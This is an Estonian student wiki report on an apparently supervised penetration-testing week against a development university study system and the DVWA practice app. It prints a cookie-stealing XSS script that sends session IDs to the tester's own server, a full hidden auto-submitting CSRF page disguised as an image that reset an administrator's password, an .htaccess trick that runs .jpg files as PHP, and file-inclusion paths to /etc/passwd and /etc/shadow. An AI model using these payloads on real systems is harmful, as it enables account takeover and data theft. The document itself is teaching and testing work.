Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:03:34Z

Ulihten: /* Juhendajad */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
